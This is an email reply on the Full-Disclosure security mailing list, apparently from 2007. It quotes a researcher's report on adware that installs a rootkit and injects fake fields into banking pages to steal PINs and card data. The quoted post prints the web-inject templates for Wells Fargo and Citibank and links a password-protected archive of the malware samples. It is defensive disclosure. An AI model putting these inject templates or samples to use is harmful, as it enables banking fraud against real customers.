Why is this "genius" sending virus infected attachments to the list? <br>The Trojan Horse Infostealer.Bancos.Z is attached to his "research data"... it steals passwords and logs keystrokes entered into certain financial Web sites.
<br><br><br><br><div><span class="gmail_quote">On 3/12/07, <b class="gmail_sendername">Thierry Zoller</b> <<a href="mailto:Thierry@zoller.lu">Thierry@zoller.lu</a>> wrote:</span><blockquote class="gmail_quote" style="border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;">
Dear list,<br><br>Whoever deals with these poeple and thinks they are a benign Adware<br>company (and thus spreads their bundles.<br><br>Check this :<br>Ignoring the fact that they basicaly install a Rootkit, I attached a
<br>few files I reversed, they install a DLL that does not directly KEYLOG your<br>banking data, but INJECTS HTML CODE into the _genuine_ (SSLed) Banking page<br>asking you to enter more details (like PIN, Magic Password etc), then
<br>capture that data and transmit it (I did no further investigation)<br><br><a href="http://secdev.zoller.lu/system32.zip">http://secdev.zoller.lu/system32.zip</a><br>Pass: 123<br><br>I am disgusted. They even created their own XML parser for this ...
<br><br>An extract of HTML code they inject :<br>-------------------------------------<br><inject<br>url="wellsfargo"<br>before="name=userid autocomplete='off'></DIV>"<br>what="
<br><DIV><LABEL for=userid>ATM PIN</LABEL>:<BR><SPAN class='mozcloak'><INPUT id=pin tabIndex=2 maxLength=4 type=password size=4 name=pin autocomplete='off'></SPAN></DIV>
<br>"<br>block="alt=Go"<br>check="pin"<br>quan="4"<br>content="d"<br>><br></inject><br>------------------------------------<br><br>Attached the main files (pass 123), feel free to add this as HIPS or whatever
<br>signatures, those interested in a complete reversal can contact me<br>to receive the EXE in question.<br><br>I have no more time feel free to dig deeper.<br><br><br>I especialy liked this :<br>------------------------
<br><inject<br>url="<a href="http://citibank.com">citibank.com</a>"<br><TR><TD colspan=3 class=smallArial noWrap><SPAN STYLE='color:red'>To prevent fraud enter your credit card information please:</SPAN></TD></TR>
<br><br><br>Puke..<br><br>--<br><a href="http://secdev.zoller.lu">http://secdev.zoller.lu</a><br>Thierry Zoller<br><br>_______________________________________________<br>Full-Disclosure - We believe in it.<br>Charter: <a href="http://lists.grok.org.uk/full-disclosure-charter.html">
http://lists.grok.org.uk/full-disclosure-charter.html</a><br>Hosted and sponsored by Secunia - <a href="http://secunia.com/">http://secunia.com/</a><br></blockquote></div><br>